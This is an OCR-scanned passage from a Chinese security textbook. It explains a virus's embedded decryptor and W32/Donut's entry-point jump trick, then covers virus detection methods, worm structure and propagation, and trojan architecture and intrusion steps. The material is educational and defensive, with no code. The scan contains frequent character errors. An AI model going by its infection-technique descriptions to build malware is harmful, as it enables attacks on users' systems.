主 程序 可 以 正确 执行 ,如 图 9-16 所 示 。 

当 被 感染 程序 启动 时 ,解密 代码 就 被 执行 。 它 解密 病毒 体 密 文 ,并 给 予 其 控制 权 。 
对 这 类 病毒 进行 检测 的 扫描 代码 将 更 加 复杂 。 因 为 扫描 器 要 么 必须 检测 出 解密 程序 
被 分 割 成 的 各 个 片段 ,要 么 必须 采用 某 种 更 先进 的 扫描 技术 (如 代码 模拟 ) 来 使 检测 更 
容易 一 些 。 
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图 9-16 嵌入 式 解密 程序 技术 


(8) 迷惑 性 欺骗 跳 转 技术 。W32/Donut 是 最 早 感染 . NET 可 执行 文件 的 病毒 , 它 并 
不 依赖 及 时 (JIT) 编 译 技术 。 当 执行 已 被 感染 的 . NET PE 文件 时 ,Donut 病毒 立即 获得 
了 控制 权 。 该 病毒 使 用 最 简单 可 行 的 技术 来 感染 . NET 文件 。 它 把 位 于 . NET 文件 入 口 
点 的 6 字 节 长 的 指向 _CorExeMain() 导 入 表 的 跳 转 指令 替换 为 一 个 指向 病毒 入口 点 的 跳 
转 指 令 。 头 部 的 入 口 点 不 会 被 病毒 改变 。 这 个 技术 称 为 迷惑 性 欺骗 跳 转 。 入 口 点 的 实际 
跳 转 会 被 蔡 换 为 一 个 0Xe9(JMP) 操 作 码 ,后 面 跟着 一 个 偏 移 地 址 ,指向 位 于 重 定位 节 第 
一 个 物理 字 节 的 病毒 体 。 迷 惑 性 欺骗 跳 转 技术 是 一 种 避免 修改 宿主 文件 原始 入 口 点 的 常 
见 技术 。 该 技术 可 以 对 抗 启发 式 检 测 。 图 9-17 显示 了 这 种 跳 转 技术 。 
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图 9-17 迷惑 性 欺骗 跳 转 技术 


4. 病毒 的 检测 

病毒 感染 正常 文件 和 系统 会 引起 各 种 变化 ,这 些 变 化 可 以 作为 诊断 病毒 的 依据 。 传 
统 的 病毒 检测 方法 有 : 比较 法 .搜索 法 、 分 析 法 .感染 实验 法 、 软 件 模拟 法 等 。 目 前 广泛 采 
用 的 病毒 检测 技术 有 病毒 行为 监测 技术 、 启 发 式 代码 扫描 分 析 技 术 、 虚 拟 机 查 毒 技术 等 。 

1) 比较 法 

比较 法 是 用 原始 的 或 者 正常 的 内 容 与 被 检测 的 进行 比较 ,包括 长 度 比较 法 、 内 容 比 较 
法 、 内 存 比较 法 、 中 断 比较 法 等 。 

长 度 比较 法 和 内 容 比 较 法 检测 长 度 和 内 容 的 变化 ,并 以 此 作为 判定 的 依据 。 但 是 长 
度 和 内 容 的 变化 可 能 是 合法 的 , 且 有 些 病毒 感染 文件 时 ,宿主 文件 长 度 可 能 保持 不 变 。 故 
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该 方法 只 能 作为 检测 手段 之 一 并 与 其 他 方法 配合 使 用 。 


内 存 比较 法 是 一 种 对 内 存 驻 留 病 毒 进 行 检 测 的 方法 。 由 于 病毒 驻 留 内 存 , 因 此 必须 
在 内 存 中 申请 一 定 的 空间 ,并 占用 该 空间 ,通过 对 内 存 的 检测 ,观察 其 空间 变化 ,判定 是 否 
有 病毒 驻 留 空间 。 但 该 方法 对 隐 项 型 病毒 无 效 。 
病毒 为 实现 隐蔽 和 传染 的 目的 ,需要 更 改 、 接 管 中 断 向 量 ,让 系统 中 断 向 量 转向 执行 
病毒 程序 。 将 正常 系统 的 中 断 向 量 与 有 毒 系统 的 中 断 向 量 比较 ,可 以 发 现 是 否 有 病毒 修 
改 和 盗用 中 断 向 量 。 
比较 法 的 好 处 是 简单 方便 ,不 需要 专用 软件 ,缺点 是 无 法 确认 病毒 的 种 类 。 被 检测 程 
序 与 原始 备份 间 的 差别 原因 需要 进一步 验证 。 
2) 校 验 和 法 
计算 正常 文件 的 内 容 的 校 验 和 ,并 将 该 校 验 和 写 入 文件 中 保存 。 在 文件 过 程 中 ,定期 
地 检测 文件 的 校 验 和 ,判别 是 否 和 原来 保存 的 校 验 和 一 致 ,从 而 判断 文件 是 否 感染 病毒 ， 
这 种 叫 校 验 和 法 。 它 既 可 以 发 现 已 知 病毒 ,也 可 以 发 现 未 知 病毒 。 该 方法 无 法 识别 病毒 
种 类 ,另外 ,病毒 感染 并 非 文 件 内 容 改变 的 唯一 原因 ,文件 内 容 的 改变 也 有 可 能 是 正常 程 
序 引 起 的 ,所 以 有 误 报 的 可 能 ,而 且 该 方法 会 影响 文件 的 运行 速度 。 该 方法 对 隐蔽 型 病毒 
无 效 , 因 为 隐蔽 型 病毒 进入 内 存 后 ,可 以 自动 剥 去 染 毒 程序 中 的 病毒 代码 ,使 校 验 和 保持 
不 变 。 
3) 扫描 法 
扫描 法 是 根据 每 一 种 病毒 含有 的 特征 字符 串 , 对 被 检测 的 对 象 进行 扫描 。 如 果 在 被 
检测 对 象 内 部 发 现 了 某 一 种 特定 字符 串 , 表 明 发 现 了 该 字符 串 所 代表 的 病毒 。 扫 描 法 包 
括 特征 代码 扫描 法 和 特征 字 扫 描 法 。 
特征 代码 扫描 法 的 扫描 软件 由 两 部 分 组 成 : 一 部 分 是 病毒 代码 库 , 含 有 经 过 特别 选 
定 的 各 种 计算 机 病毒 的 代码 串 ; 另 一 部 分 是 利用 该 代码 库 进行 扫描 的 扫描 程序 。 扫 描 程 
序 能 识别 的 病毒 的 数目 完全 取决 于 病毒 代码 库 内 所 含 病 毒 的 种 类 数 。 病 毒 代码 串 的 选择 
是 非常 重要 的 ,选择 代码 串 的 规则 有 : 代码 串 必 须 有 代表 性 ;代码 串 不 应 含有 病毒 的 数据 
区 ;在 保持 唯一 性 的 前 提 下 ,特征 代码 串 长 度 尽 量 短 ,以 减少 时 间 和 空间 开销 ;代码 串 一 定 
要 选 出 最 具 代 表 性 和 区 别 性 的 特征 串 ; 特 征 串 的 选取 应 尽量 避免 误 报 。 
特征 字 描 法 是 基于 特征 串 扫描 法 发 展 的 一 种 新 方法 , 它 工 作 速度 更 快 . 误 报 更 少 ,但 
仍然 存在 特征 代码 扫描 法 的 一 些 缺 点 。 特 征 字 扫 描 只 需 从 病毒 体内 抽取 很 少 的 几 个 关键 
的 特征 字 并 组 成 特征 字库 。 由 于 需要 处 理 的 字 节 很 少 ,又 不 必 进行 串 匹配 ,从 而 加 快 了 识 
别 速度 。 
4) 行为 监测 法 
利用 病毒 的 特有 行为 特性 监测 病毒 的 方法 称 为 行为 监测 法 。 通 过 对 病毒 的 观察 和 研 
,发 现 病毒 的 行为 具有 共性 , 且 有 特殊 性 , 即 在 正常 程序 中 ,这 些 行 为 较为 罕见 。 当 程序 
行 时 对 其 行为 进行 监视 ,如 果 发 现 了 病毒 行为 ,立即 报警 。 这 些 行为 特征 列举 如 下 。 
占用 INT 13H。 引 导 型 病毒 都 攻击 Boot 扇 区 或 主 引 导 扇 区 。 系 统 启动 时 ,当主 引导 
扇 区 获得 执行 权时 ,系统 就 开始 工作 。 一 般 引 导 型 病毒 都 会 占用 INT 13H 功能 , 挂 接 病 
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毒 代码 。 

对 EXE 文件 做 写 入 操作 。PE 文件 病毒 一 般 要 修改 程序 入 口 点 ,原本 程序 入 口 点 是 
指向 可 执行 代码 节 (. text) ,但 中 毒 后 ,病毒 在 PE 文件 尾部 添加 节 , 并 修改 程序 入 口 点 使 
其 指向 病毒 节 。 

搜索 API 函数 地 址 。PE 病毒 一 般 采用 直接 API 调用 技术 , 即 在 运行 时 直接 定位 
API 函数 在 内 存 中 的 入口 地 址 然后 调用 该 API 函数 。 

行为 检测 法 的 优点 在 于 不 仅 可 以 发 现 已 知 病毒 ,而 且 可 以 预报 多 数 未 知 病毒 。 缺 点 
在 于 可 能 有 误 报 和 不 能 识别 病毒 的 名 称 , 实 现 难度 较 大 。 

5) 感染 实验 法 

感染 实验 是 一 种 简单 实用 的 检测 方法 ,该 方法 可 以 检测 出 病毒 检测 工具 不 认识 的 新 
病毒 ,摆脱 对 病毒 检测 工具 的 依赖 ,自主 检测 可 疑 的 新 病毒 。 其 原理 是 利用 了 病毒 的 最 重 
要 的 基本 特征 一 一 感染 特征 : 即 所 有 的 病毒 都 会 进行 感染 。 如 果 系 统 中 有 异常 行为 ,而 
且 新 的 检测 工具 也 查 不 出 病毒 时 ,可 以 考虑 做 感染 实验 。 先 运行 可 疑 系统 中 的 程序 ,再 运 
行 一 些 保证 没有 病毒 的 正常 程序 ,然后 观察 这 些 正 常 程序 的 长 度 和 校 验 和 ,从 而 断言 系统 
中 有 病毒 。 

6) 软件 模拟 法 

多 态 型 病毒 每 次 感染 都 改变 其 病毒 密码 ,对 付 这 种 病毒 时 特征 代码 法 会 失效 。 因 为 
多 态 型 病毒 代码 实施 密码 化 ,而 且 每 次 采用 的 密 钥 不 同 ,因此 把 染 毒 文件 中 的 病毒 代码 进 
行 比较 ,也 无 法 找 出 相同 的 可 能 作为 特征 的 稳定 代码 。 虽 然 行为 检测 可 以 检测 多 态 型 病 
毒 ,但 在 检测 出 病毒 后 ,无 法 进行 病毒 处 理 , 因 为 不 知道 病毒 种 类 和 名 称 ,所 以 难以 进行 
处 理 。 

为 了 检测 多 态 病 毒 ,软件 模拟 法 是 一 种 新 方法 ,也 称 为 软件 仿真 扫描 法 。 它 是 一 种 软 
件 分 析 器 ,用 软件 方法 来 模拟 和 分 析 程 序 的 运行 : 模拟 CPU 运行 ,在 其 设计 的 虚拟 机 下 
执行 病毒 的 变 体 引擎 解码 程序 ,安全 地 将 多 态 病 毒 解 开 , 使 其 显露 出 真实 面目 。 新 型 检测 
工具 开始 运行 时 使 用 特征 代码 法 检测 病毒 ,如 果 发 现 有 隐蔽 性 病毒 或 多 态 病毒 嫌疑 时 , 启 
动 软件 模拟 模块 监视 病毒 的 运行 , 待 病毒 自身 的 密码 译 码 后 ,再 运用 特征 代码 法 来 识别 病 
毒 的 种 类 。 
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1. 蠕虫 病毒 的 区 别 及 联系 

蠕虫 的 最 大 特点 是 利用 各 种 安全 漏洞 进行 自动 传播 。 蠕 虫 和 病毒 都 具有 传染 性 和 复 
制 功 进 , 但 是 两 者 还 是 有 区 别 , 如 表 9-6 所 示 。 了 解 这 些 区 别 有 利于 采取 有 针对 性 的 措施 
进行 防治 。 

这 里 ,病毒 主要 攻击 文件 系统 ,传染 过 程 中 ,计算 机 使 用 者 是 传染 的 触发 者 ,计算 机 使 
用 者 的 水 平 高 低 常常 决定 了 病毒 所 能 造成 破坏 的 程度 。 蠕 虫 主 要 利用 计算 机 系统 漏洞 传 
染 , 搜 索 到 存在 漏洞 的 计算 机 后 主动 攻击 ,与 计算 机 操作 者 是 否 进 行 操作 无 关 。 


表 9-6 蠕虫 和 病毒 的 区 别 
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属 性 病 ” 毒 里 ” 虫 
存在 形式 寄生 独立 个 体 
复制 机 制 插入 到 宿主 程序 (文件 ) 中 自身 的 复制 
传染 机 制 宿主 程序 运行 系统 存在 漏洞 
搜索 机 制 主要 针对 本 地 文件 主要 针对 网 络 上 的 计算 机 
触发 传染 计算 机 使 用 者 程序 自身 
影响 重点 文件 系统 网 络 性 能 ,系统 性 能 
计算 机 使 用 者 角色 病毒 传播 中 的 关键 环节 无 关 
防治 措施 从 宿主 程序 中 摘除 为 系统 补丁 
对 抗 主体 计算 机 使 用 者 、 反 病毒 厂商 系统 提供 商 , 网 络 管理 员 
2. 蠕虫 的 分 类 


根据 蠕虫 的 传播 运作 方式 ,可 将 蠕虫 分 为 两 类 : 主机 蠕虫 和 网 络 蠕虫 。 

(1) 主机 蠕虫 。 所 有 部 分 均 包 含 在 其 所 运行 的 计算 机 中 ,利用 网 络 连接 仅仅 是 为 了 
将 其 自身 复制 到 其 他 计算 机 中 。 对 主机 蠕虫 而 言 ,将 自己 复制 到 另外 一 台 计 算 机 后 ,原来 
的 主机 蠕虫 则 自行 终止 。 因 此 ,任意 时 刻 , 只 有 一 个 蠕虫 的 复制 在 运行 。 这 种 蠕虫 也 称 为 
“兔子 ”。 

(2) 网 络 蠕虫 。 由 许多 部 分 ( 称 为 段 ) 组 成 ,而 且 每 一 个 部 分 运行 在 不 同 的 计算 机 中 ， 
并 且 使 用 网 络 的 目的 是 为 了 进行 各 个 部 分 之 间 的 通信 以 及 传播 。 网 络 蠕虫 具有 一 个 主 
段 ,该 主 段 用 于 协调 其 他 段 的 运行 ,这 种 蠕虫 也 称 为 "章鱼 ”。 

3. 蠕虫 与 软件 漏洞 的 关系 

根据 蠕虫 利用 漏洞 的 不 同 ,可 将 其 细 分 为 邮件 蠕虫 `. 网 页 蠕虫 和 系统 漏洞 蠕虫 。 

(1) 邮件 蠕虫 。 邮 件 蠕虫 要 利用 多 用 途 网 际 邮 件 扩 充 协 议 (Multipurpose Internet 
Mail Extension Protocol,MIME) 漏 洞 。MIME 是 一 小 段 用 来 描述 信息 类 型 的 数据 ,浏览 
器 通过 读 取 它 来 得 知 接收 到 的 数据 该 怎么 处 理 : 如 果 是 文本 和 图 片 就 显示 出 来 ;是 程序 
就 弹出 下 载 确认 。 如 果 攻 击 者 给 用 户 发 送 一 个 带 有 . exe 后 级 的 可 执行 文件 的 邮件 ,并 把 
它 的 MIME 描述 为 音乐 文件 ,这 时 候 浏览 器 会 把 它 解码 到 临时 目录 ,然后 根据 它 的 后 绥 
名 调用 一 个 能 打开 它 的 应 用 程序 来 直接 运行 这 个 文件 ,用 户 的 计算 机 也 开始 遭 到 破坏 。 
正 因 为 如 此 ,邮件 蠕虫 才 成 为 当今 世界 蠕虫 病毒 的 主要 来 源 。 

(2) 网 页 蠕虫 。 网 页 蠕虫 主要 利用 IFrame 漏洞 和 MIME 漏洞 。IFrame 漏洞 是 一 段 
用 于 往 网 页 里 放 入 一 个 小 页 面 的 HTML 语言 , 它 用 来 实现 “框架 ”结构 。 往 一 个 页 面 里 
放 入 多 个 IFrame 漏洞 时 ,框架 里 请 求 运行 程序 的 代码 就 会 被 执行 ,由 于 IFrame 漏洞 的 
尺寸 可 以 自由 设置 ,因此 破坏 者 可 以 在 一 个 页 面 里 放 和 人 多 个 不 可 见 的 框架 ,并 附带 多 个 不 
可 见 的 有 害 程序 ,浏览 该 网 页 的 机 器 就 自动 运行 有 害 程序 。 

网 页 蠕虫 可 以 分 为 两 种 : 一 种 是 用 一 个 IFrame 漏洞 插入 一 个 邮件 框架 ,同时 利用 
MIME 漏洞 执行 蠕虫 ,这 是 直接 沿用 邮件 蠕虫 的 方法 ; 另 一 种 是 用 IFrame 漏洞 和 浏览 器 
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下 载 文件 的 漏洞 来 运作 的 ,首先 由 一 个 包含 特殊 代码 的 页 面 去 下 载 放 在 另 一 个 网 站 的 恶 
意 文件 ,然后 运行 它 , 完 成 蠕虫 传播 。 

(3) 系统 漏洞 蠕虫 。 系 统 漏洞 蠕虫 一 般 具 有 一 个 小 型 的 漏洞 利用 系统 , 它 随 机 产生 
IP 地 址 并 尝试 漏洞 利用 ,然后 将 自身 复制 过 去 。 它 们 往往 造成 被 感染 系统 性 能 迅速 降 
低 , 甚 至 系统 崩 演 ,是 杀伤 力 最 大 的 一 类 蠕虫 ,我 们 将 主要 讨论 这 种 蠕虫 。 典 型 的 例子 是 
SQL 蠕虫 和 利用 RPC 溢出 漏洞 的 冲击 波 蠕虫 ,利用 LSASS 漏洞 的 振荡 波 等 蠕虫 。 

4. 蠕虫 的 基本 结构 

1) 蠕虫 的 实体 结构 

蠕虫 程序 相对 于 一 般 的 应 用 程序 ,在 实体 结构 方面 体现 了 更 大 的 复杂 性 。 通 过 对 里 
虫 程序 的 分 析 , 可 以 粗略 地 把 蠕虫 程序 的 实体 结构 分 为 如 下 6 个 部 分 ,具体 的 某 个 蠕虫 可 
能 仅 包含 其 中 几 个 部 分 ,如 图 9-18 所 示 。 


师 虫 实体 结构 
未 编译 的 | [已 编译 的 连接 | | 可 运行 的 受 感染 系统 上 的 ] | 
源 代码 模块 代码 脚本 | | ”可 执行 程序 ”| | 信息 数据 


图 9-18 ”蠕虫 实体 结构 


(1) 未 编译 的 源 代码 : 由 于 某 些 程序 参数 必须 在 编译 时 确定 ,所 以 蠕虫 程序 可 能 包 
含 一 部 分 未 编译 的 程序 源 代码 。 

(2) 已 编译 的 链接 模块 : 不 同 的 系统 ,可 能 需要 不 同 的 运行 模块 ,例如 ,不 同 的 硬件 
厂商 和 不 同 的 系统 厂商 可 能 采用 不 同 的 运行 库 。 

(3) 可 运行 代码 : 整个 蠕虫 可 能 由 多 个 编译 好 的 程序 组 成 。 

(4) 脚本 : 利用 脚本 可 以 节省 大 量 的 程序 代码 ,充分 利用 系统 shell 的 功能 。 

(5) 受 感 染 系 统 上 的 可 执行 程序 : 受 感染 系统 上 的 可 执行 程序 ,如 文件 传输 等 ,可 以 
被 蠕虫 作为 自己 的 组 成 部 分 。 

(6) 信息 数据 : 包括 已 经 破解 的 口令 、 要 攻击 的 地 址 列表 、 蠕 虫 自身 的 压缩 包 等 。 

2) 蠕虫 的 功能 结构 

蠕虫 在 功能 上 可 以 分 为 基本 功能 模块 和 扩展 功能 模块 。 实 现 了 基本 功能 模块 的 蠕虫 
程序 就 能 完成 复制 传播 流程 ,包含 扩展 功能 模块 的 蠕虫 程序 则 具有 更 强 的 生存 能 力 和 破 
坏 力 。 蠕 虫 程序 的 功能 结构 如 图 9-19 所 示 。 

基本 功能 由 如 下 5 个 功能 模块 组 成 : 

(1) 扫描 搜索 模块 : 寻找 下 一 台 要 传染 的 计算 机 ,为 提高 搜索 效率 ,可 以 采用 搜索 
算法 。 

(2) 攻击 模块 : 在 被 感染 的 计算 机 上 建立 传输 通道 ,为 减少 传染 数据 传输 量 , 可 以 采 
用 引导 式 结构 。 

(3) 传输 模块 : 计算 机 之 间 的 蠕虫 程序 复制 。 

(4) 信息 收集 模块 : 搜寻 和 建立 被 传染 计算 机 的 信息 。 

(5) 繁殖 模块 : 建立 自身 的 多 个 副本 ,在 同一 台 计 算 机 上 提高 传输 效率 、 避 免 重复 
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蠕虫 程序 功能 结构 
| 


基本 功能 模块 扩展 功能 模块 
扫描 | | 攻击 | | 传输 | | 信息 隐藏 通信 | | 控制 
索 


搜索 收集 | | 紧 殖 破坏 
模块 | | 模块 | | 模块 | | 模块 | | 模块 | | 模块 | | 模块 | | 模块 | | 模块 


图 9-19 蠕虫 程序 的 功能 结构 


传输 。 
扩展 功能 模块 由 如 下 4 个 部 分 组 成 : 
(1) 隐藏 模块 : 隐藏 蠕虫 程序 ,使 简单 的 检测 不 能 发 现 蠕虫 。 
(2) 破坏 模块 : 摧毁 或 破坏 被 感染 计算 机 ,或 在 被 感染 计算 机 上 留 下 后 门 程序 等 。 
(3) 通信 模块 : 蠕虫 之 间 、 蠕 虫 同 黑客 之 间 进 行 交流 ,这 可 能 是 未 来 蠕虫 发 展 重点 。 
(4) 控制 模块 : 调整 蠕虫 行为 ,更 新 其 他 功能 模块 ,控制 被 感染 计算 机 。 


5. 蠕虫 的 工作 方式 
蠕虫 的 工作 方式 一 般 是 : 扫描 习 攻 击 一 复制 ,如 图 9-20 所 示 。 
二 IP 地 址 的 生成 可 能 采 
随机 生成 IP 地 址 用 可 种 策略" 下 
1 gx 
项 框 中 操作 可 在 一 个 数 
据 包 中 完成 


攻击 、 传 染 现场 处 理 


图 9-20 ”蠕虫 的 一 般 流程 


(1) 搜索 扫描 。 由 蠕虫 的 搜索 扫描 功能 模块 负责 探测 存在 漏洞 的 主机 。 当 程序 向 某 
个 主机 发 送 探测 漏洞 的 信息 并 收 到 成 功 的 反馈 信息 后 ,就 得 到 一 个 可 攻击 的 对 象 。 

(2) 攻击 。 攻 击 模块 按 漏 洞 攻击 步骤 自动 攻击 上 一 步 又 中 找到 的 对 象 ,取得 该 主机 
的 权限 (一 般 为 管理 员 权 限 ) ,获得 一 个 Shell。 对 Windows 系统 来 说 是 cmd. exe, 得 到 这 
个 Shell 后 就 有 拥有 了 对 整个 系统 的 控制 权 。 

(3) 复制 。 繁 殖 模块 通过 原 主 机 和 新 主机 之 间 的 交互 ,将 蠕虫 程序 复制 到 新 主机 并 
启动 。 复 制 过 程 也 有 很 多 种 方法 .可 以 利用 系统 本 身 的 程序 实现 ,也 可 以 用 蠕虫 月 带 的 程 
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序 实现 。 复 制 过 程 实际 上 就 是 一 个 网 络 文件 传输 的 过 程 。 

6. 蠕虫 的 防治 与 检测 

1) 蠕虫 防治 的 方案 

蠕虫 防治 方案 可 以 从 两 个 方面 来 考虑 : 第 一 ,从 它 的 实体 结构 来 考虑 ,如 果 破 坏 了 它 
的 实体 组 成 的 一 个 部 分 , 则 破坏 了 其 完整 性 ,使 其 不 能 正常 工作 ,从 而 达到 阻止 其 传播 的 
目的 ;第 二 ,从 它 的 功能 组 成 来 考虑 ,如 果 使 其 某 个 功能 组 成 部 分 不 能 正常 工作 ,也 同样 能 
达到 阻止 其 传播 的 目的 。 具 体 可 以 分 为 如 下 一 些 措施 。 

(1) 修补 系统 漏洞 。 主 要 是 由 系统 服务 提供 商 负责 ,及 时 提供 系统 漏洞 补丁 程序 ,用 
户 及 时 安装 补丁 。 

(2) 分 析 蠕 虫 行 为 。 通 过 分 析 特 定 蠕虫 的 行为 ,给 出 有 针对 性 的 预防 措施 。 例 如 , 预 
先 建立 蠕虫 判断 目标 计算 机 系统 是 否 已 经 感染 时 设立 的 标记 。 

(3) 重 命名 或 者 删除 命令 解释 器 。 如 UNIX 系统 下 的 shell、Windows 系统 下 的 
WScript. exe。 重 命名 和 删除 命令 解释 器 ,可 以 避免 执行 蠕虫 实体 中 的 脚本 。 

(4) 防火 墙 。 禁 止 除 服务 端口 外 的 其 他 端口 ,这 将 切断 蠕虫 的 传播 通道 和 通信 通道 。 

(5) 公告 。 通 过 邮件 列表 等 公告 措施 ,加 快 ,协调 技术 人 员 之 间 的 信息 交流 和 对 蠕虫 
攻击 的 对 抗 工作 。 

2) 蠕虫 的 防治 周期 

蠕虫 的 防治 周期 可 分 为 4 个 阶段 。 

(1) 预防 阶段 。 在 利用 某 个 漏洞 进行 攻击 的 蠕虫 产生 之 间 ,积极 主动 地 升级 系统 、 安 
装 防火 墙 、 安 装 入 侵 检测 系统 等 , 防 患 于 未 然 。 

(2) 检测 阶段 。 密 切 注意 网 络 流量 异常 .TCP 连接 异常 等 异常 现象 ,尽量 在 蠕虫 的 
缓慢 启动 期 发 现 蠕虫。 

(3) 遏制 阶段 。 在 蠕虫 的 快速 传播 期 ,通过 各 种 手段 遏制 蠕虫 的 快速 传播 。 

(4) 清除 阶段 。 清 除 已 感染 主机 中 的 蠕虫 ,通过 打 补 丁 等 手段 ,杜绝 易 感 染 主机 的 存 
在 ,最 终 清 除 蠕虫 。 

3) 对 未 知 蠕虫 的 检测 

比较 通用 的 方式 是 对 流量 异常 的 统计 分 析 、 对 TCP 连接 异常 的 分 析 、 对 ICMP 数据 
异常 的 分 析 等 。 以 ICMP 流量 异常 的 分 析 为 例 ,在 蠕虫 的 扫描 阶段 ,会 随机 生成 大 量 的 
IP 地 址 进行 扫描 ,探测 漏洞 主机 。 这 些 被 扫描 的 IP 中 ,存在 许多 空 的 或 不 可 达 的 IP 地 
址 ,从 而 在 一 段 时 间 内 ,蠕虫 主机 会 接收 到 大 量 的 来 自 不 同 路 由 器 的 ICMP 不 可 达 数 据 
包 , 通 过 对 这 些 数据 包 进 行 检测 和 统计 , 即 可 在 蠕虫 的 扫描 阶段 将 其 发 现 , 然 后 将 蠕虫 主 
机 进行 隔离 分 析 。 
944 木马 的 机 理 与 防治 

1. 木马 的 定义 

木马 的 名 称 源 于 古 希 腊 神 话 特洛伊 木马 。 木 马 是 一 种 恶意 程序 ,是 一 种 基于 远程 控 


制 的 攻击 工具 , 它 一 旦 入 侵 用 户 的 计算 机 ,就 悄悄 地 在 宿主 计算 机 上 运行 ,在 用 户 毫 无 觉 
察 的 情况 下 ,让 攻击 者 获得 远程 访问 和 控制 系统 的 权限 ,进而 在 用 户 的 计算 机 中 修改 文 
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件 .注册 表 控制 鼠标 、 监 视 /控制 键盘 ,或 窃取 用 户 信息 , 妃 至 实施 远程 控制 。 它 是 攻击 者 
的 主要 攻击 手段 之 一 ,具有 隐蔽 性 和 非 授权 性 等 特点 。 

病毒 的 定义 强调 自我 复制 的 传染 性 特点 ,木马 的 名 称 强 调 意图 和 功能 。 木 马 一 般 不 
进行 自我 复制 ,但 具有 寄生 性 ,如 捆绑 在 合法 程序 中 得 到 安装 、 启 动 木马 的 权限 ,DLL 木 
马 甚 至 采用 动态 嵌入 技术 寄生 在 合法 程序 的 进程 中 。 木 马 的 最 终 意图 是 窃取 信息 、 实 施 
远程 监控 。 木 马 与 合法 远程 控制 软件 的 主要 区 别 在 于 是 否 具有 隐藏 性 、 非 授权 性 。 

2. 木马 的 结构 

木马 系统 通常 采用 服务 器 、 客 户 端 结构 。 即 分 为 服务 端 和 客户 端 。 通 常 功 能 上 由 木 
马 配置 程序 ,控制 程序 和 木马 程序 3 个 部 分 组 成 ,如 图 9-21 所 示 。 

(1) 木马 程序 。 也 称 为 服务 器 程序 , 驻 留 在 受害 一 -------- 
者 的 系统 中 ,非法 获取 其 操作 权限 ,负责 接收 控制 指 


令 ,并 根据 指令 或 配置 发 送 数 据 给 控制 端 。 二 
(2) 木马 配置 程序 。 木 马 配置 程序 设置 木马 程序 了 
1 


的 端口 号 、 触 发 条 件 、 木 马 名 称 等 ,使 其 在 服务 器 端 隐 


藏 得 更 隐蔽 。 有 时 ,该 配置 功能 被 集成 在 控制 程序 的 控制 | 
菜单 内 ,不 单独 作为 一 个 程序 。 +3 
(3) 木马 控制 程序 。 控 制程 序 控制 远程 木马 服务 < 


器 (有 些 控制 程序 集成 了 木马 的 配置 功能 ) ,统称 为 控 
制 端 (客户 端 ) 程 序 ,负责 配置 服务 器 、 给 服务 器 发 送 一 -1 
指令 ,同时 接收 服务 器 传 过 来 的 数据 。 用 本 合生 全 和 

3. 木马 的 基本 原理 

多 数 木马 包括 客户 端 和 服务 器 端 两 个 部 分 , 即 采用 服务 器 /客户 端 结构 。 攻 击 者 通常 
利用 一 种 称 为 绑 定 程序 的 工具 将 木马 服务 器 绑 定 到 某 个 合法 软件 上 。 只 要 用 户 运行 该 软 
件 , 木 马 的 服务 器 就 在 用 户 毫 无 觉察 的 情况 下 完成 安装 过 程 。 

攻击 者 要 利用 客户 端 控制 服务 器 ,通常 是 需要 先 建立 一 个 通信 连接 。 建 立木 马 连 接 ， 
需要 知道 木马 的 计算 机 的 IP 地 址 ,这 个 可 以 通过 端口 扫描 来 搜寻 ,因为 木马 服务 器 端 会 
开放 一 些 特殊 的 端口 。 一 旦 客户 端的 扫描 功能 发 现 有 些 IP 地 址 的 特定 端口 处 于 开放 状 
态 ,说 明 这 些 IP 地 址 的 机 器 可 能 中 了 木马 。 除 了 这 种 扫描 的 方法 以 外 ,还 可 能 木马 主动 
通知 攻击 者 需要 的 信息 

获取 木马 服务 器 信息 后 ,建立 服务 端 和 客户 端的 连接 ,控制 端 便 可 以 进行 一 系列 远程 
控制 了 。 如 果 攻 击 者 控制 了 大 量 的 计算 机 , 则 可 能 发 起 DDoS 攻击 。 这 些 被 控制 的 机 器 
有 时 候 被 称 为 僵尸、 肉鸡 。 

4.。 木马 实施 网 络 入 侵 的 基本 步骤 

用 木马 入 侵 网 络 , 通 常 包括 6 个 步骤 ,如 图 9-22 所 示 。 

(1) 配置 木马 。 一 般 而 言 ,一 个 设计 成 熟 的 木马 都 有 木马 配置 程序 ,从 具体 的 配置 内 
容 看 ,主要 实现 两 个 功能 ; 森马 伪装 , 即 让 木马 在 服务 器 尽 可 能 隐藏 得 更 加 隐蔽 ;信息 反 
馈 , 即 设置 信息 反馈 的 方式 或 地 址 ,如 设置 信息 反馈 的 邮件 地 址 .QQ 号 等 。 在 释放 木马 
之 前 可 以 配置 木马 ,释放 木马 之 后 也 可 以 远程 配置 木马 。 
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图 9-22 ”木马 入 侵 网 络 的 基本 步骤 


(2) 传播 木马 。 即 使 用 各 种 传播 方式 ,将 配置 好 的 木马 传播 出 去 。 

(3) 运行 木马 。 服 务 端 用 户 运行 木马 或 拥 绑 木马 的 程序 后 ,木马 就 会 自动 进行 安装 ， 
木马 首先 将 自身 复制 到 Windows 的 系统 文件 夹 中 (C:\Windows.C:\Windows\system 
等 ) ,然后 在 注册 表 、 启 动 组 、 非 启动 组 等 位 置 设置 木马 的 触发 启动 条 件 ,完成 木马 服务 器 
的 安装 。 安 装 后 就 可 以 启动 木马 了 。 木 马 被 激活 后 ,进入 内 存 , 开 启 并 监听 预先 定义 的 木 
马 端口 ,准备 与 控制 端 建立 连接 。 

此 时 ,服务 器 端 用 户 可 以 用 netstat 查看 端口 状态 ,在 脱 机 状态 下 一 般 是 不 会 有 端口 
开放 的 ,如 果 有 端口 开放 ,就 要 注意 是 否 感 染 了 木马 。 

(4) 信息 反馈 。 信 息 反 馈 机 制 是 指 木马 成 功 安装 后 会 收集 一 些 服务 端的 软 硬 件 信 
息 ,并 通过 E-mail、QQ 等 手段 告知 控制 端的 攻击 者 。 

(5) 建立 连接 。 木 马 连 接 的 建立 必须 具备 两 个 条 件 : 第 一 ,服务 端 已 经 安装 了 木马 
程序 ;第 二 ,控制 端 .服务 端 都 在 线 。 在 此 基础 上 ,控制 端 可 以 通过 木马 端口 与 服务 端 建 立 
连接 ,进而 监控 中 了 木马 的 计算 机 。 控 制 端 要 与 服务 端 建立 连接 必须 知道 服务 端的 木马 
端口 和 IP 地址。 由 于 木马 端口 是 事先 设 定 的 ,所 以 如 何 获得 服务 端的 IP 地 址 就 更 加 重 
要 。 这 主要 有 两 种 方法 : IP 扫描 和 信息 反馈 。 

Q@ IP 扫描。 由 于 服务 端 装 有 木马 程序 ,所 以 它 的 木马 端口 (假设 为 6000) 处 于 开放 
状态 ,控制 端 只 要 扫描 IP 地 址 段 中 6000 端口 开放 的 主机 就 可 以 了 。 当 发 现 某 个 IP 的 
